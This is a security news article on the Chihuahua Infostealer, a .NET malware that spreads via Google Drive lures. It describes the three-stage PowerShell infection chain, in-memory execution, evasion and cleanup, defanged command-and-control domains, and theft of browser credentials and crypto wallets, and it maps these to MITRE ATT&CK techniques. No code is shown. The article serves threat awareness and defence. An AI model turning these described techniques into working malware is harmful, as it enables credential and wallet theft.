.Net Based Chihuahua Infostealer Exploit Google Drive Steals Browser Credentials and Crypto Wallets

A new .NET-based malware, dubbed Chihuahua Infostealer, has emerged as a significant threat to cybersecurity, targeting sensitive browser credentials and cryptocurrency wallet data.

Discovered in April 2025, this multi-stage malware employs obfuscated PowerShell scripts and trusted cloud platforms like Google Drive to deliver its payload, making it a formidable challenge for security teams.

Here’s a breakdown of its infection chain, tactics, and how organisations can defend against it.

Chihuahua Infostealer stands out for its refined approach, moving away from the “smash-and-grab” tactics of older malware.

Instead, it uses multi-stage loaders, cloud-hosted delivery, native API-based encryption, and meticulous cleanup routines to maintain persistence and evade detection.

Security researchers note that its design reflects a broader trend toward more resilient and feature-rich infostealers.

A unique quirk in the malware’s code transliterated Russian rap lyrics printed to the console during execution hints at a possible Russian influence, though no specific threat actor has been conclusively identified.

These non-functional lyrics, such as “Edu iz Voronezha v Samaru v ‘Mak’ na Polevoj,” serve as a cultural signature, adding a layer of personality to the malicious code.

How Chihuahua Spreads

The infection begins with social engineering, tricking users into executing a malicious PowerShell script.

In one documented case, a Reddit user was lured into opening a seemingly legitimate Google Drive document, which triggered an obfuscated script.

Attackers exploit trusted platforms like Google Drive, One Drive, and even GitHub to bypass filters and deliver payloads undetected.

Delivery methods include phishing emails, fake IT messages, and links shared via collaboration platforms.

The Infection Chain Unfolds in Three Stages:

Stage 1: Initial PowerShell Blob

A compact PowerShell one-liner decodes a Base64-encoded payload and executes it in memory, avoiding disk writes to evade antivirus detection. The script uses commands like Verb RunAs and execution policy bypass to run with elevated privileges discreetly.

Stage 2: Scheduled Job and Marker-Based Execution

The script rebuilds a heavily obfuscated payload, creates a scheduled job named f90g30g82 that runs every minute, and monitors the user’s Recent folder for .normaldaki marker files.

It communicates with a command-and-control (C2) server at cdn.findfakesnake[.]xyz or a fallback at cat-watches-site[.]xyz to fetch additional payloads.

Stage 3: Final Payload Execution

The malware downloads a .NET assembly from flowers.hold-me-finger[.]xyz and a Base64-encoded payload from OneDrive.

These are executed in memory using .NET reflection, followed by cleanup routines that clear the console, wipe clipboard contents, and erase local traces.

Data Theft and Evasion Tactics

According to picussecurity report, Chihuahua targets a wide range of browsers, including Chrome, Chromium, Brave, Opera, Microsoft Edge, and others, extracting saved passwords, cookies, autofill data, session tokens, and browsing history.

It also hunts for cryptocurrency wallet data by targeting specific browser extension IDs, such as EVER Wallet, Rabby, and Clover Wallet.

To remain stealthy, the malware:

• Uses in-memory execution to avoid writing files to disk.
• Employs AES encryption to secure stolen data before exfiltration over HTTPS.
• Leverages legitimate system tools like PowerShell and Windows Scheduler to blend in with normal activity.
• Deletes temporary files and artifacts to cover its tracks.

Chihuahua Infostealer represents a new breed of stealthy, multi-stage malware that combines technical sophistication with cultural flair.

Its use of trusted platforms, in-memory execution, and encrypted exfiltration makes it a serious threat to both individuals and organizations.

By understanding its infection chain and leveraging proactive defences, security teams can stay ahead of this evolving threat.

Chihuahua’s tactics align with several MITRE ATT&CK techniques:

• Initial Access (T1566.002): Spearphishing links via trusted cloud platforms.
• Execution (T1059.001): PowerShell-based payload execution.
• Persistence (T1053.005): Scheduled tasks for continuous operation.
• Defense Evasion (T1027, T1218): Obfuscated scripts and use of trusted utilities.
• Credential Access (T1555.003): Stealing browser credentials and crypto wallet data.
• Exfiltration (T1041): Encrypted data sent over HTTPS to C2 servers.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!